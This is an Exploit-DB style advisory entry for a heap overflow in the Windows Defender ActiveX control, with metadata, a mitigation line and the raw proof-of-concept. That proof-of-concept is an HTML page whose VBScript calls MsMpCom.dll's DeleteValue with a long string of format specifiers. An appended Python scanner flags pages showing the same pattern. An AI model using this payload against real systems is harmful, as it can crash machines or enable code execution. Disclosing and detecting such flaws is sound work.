Vendor: Windows Defender
By: Anonymous
CVSS: 7,8 HIGH
Heap Overflow
CWE: 122
Product Name: Windows Defender
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2020

Microsoft Windows Defender ActiveX Heap Overflow PoC

This is proof-of-concept (PoC) code for a heap overflow vulnerability in the Microsoft Windows Defender ActiveX control. The vulnerability is triggered when a maliciously crafted argument is passed to the DeleteValue method of the MsMpCom.dll library. This can lead to arbitrary code execution.

Mitigation:

Microsoft has released a security update to address this vulnerability. Users should apply the update as soon as possible.

Exploit-DB raw data:

#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#tested on :[windows 7]
#Microsoft Windows Defender

<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
prototype  = "Sub DeleteValue ( ByVal bstrKeyName As String ,  ByVal bstrValueName As String )"
memberName = "DeleteValue"
progid     = "MpComExportsLib.MsMpSimpleConfig"
argCount   = 2
 
arg1="defaultV"
arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.DeleteValue arg1 ,arg2 
 
</script>
</html>
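
A defensive check for the pattern described above, added here as an example and not part of the original entry or the Exploit-DB data: it parses a page, notes whether the control is loaded through the CLSID or ProgID shown in the PoC, and reports whether a DeleteValue call is accompanied by a long run of conversion specifiers. The names `scan_page` and `_Scan`, the threshold of 8 specifiers and both sample pages are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Both identifiers are taken from the PoC on this page (lower-cased for matching).
CLSID = "07dd3249-a591-4949-8f20-09cd347c69dc"
PROGID = "mpcomexportslib.msmpsimpleconfig"
# Assumed heuristic: 8 or more back-to-back printf-style conversion specifiers.
SPEC_RUN = re.compile(r"(?:%[a-z]){8,}", re.I)

class _Scan(HTMLParser):
    """Records ids of <object> tags bound to CLSID and the text of every script."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object":
            classid = a.get("classid", "").lower().replace("clsid:", "").strip("{} ")
            if classid == CLSID:
                self.ids.append(a.get("id", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan_page(html):
    """Return which indicators of the MsMpCom.dll DeleteValue pattern a page shows."""
    p = _Scan()
    p.feed(html)
    p.close()
    code = "\n".join(p.scripts)
    # The control can be loaded by an <object> tag or by ProgID from script.
    loads = bool(p.ids) or PROGID in code.lower()
    calls = loads and re.search(r"\.\s*DeleteValue\b", code, re.I) is not None
    long_arg = calls and SPEC_RUN.search(code) is not None
    return {"loads_control": loads, "calls_deletevalue": calls, "specifier_run": long_arg}

# Constructed sample pages (not captured traffic).
SUSPICIOUS = ("<html><object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' "
              "id='t'></object><script language='vbscript'>\n"
              'a = "' + "%s" * 12 + '"\nt.DeleteValue "k", a\n</script></html>')
BENIGN = "<html><script>var pct = '%s of %s';</script><p>DeleteValue docs</p></html>"
```

`scan_page` returns three booleans so a proxy or mail-gateway rule can log on `loads_control` alone and block only when `specifier_run` is also set.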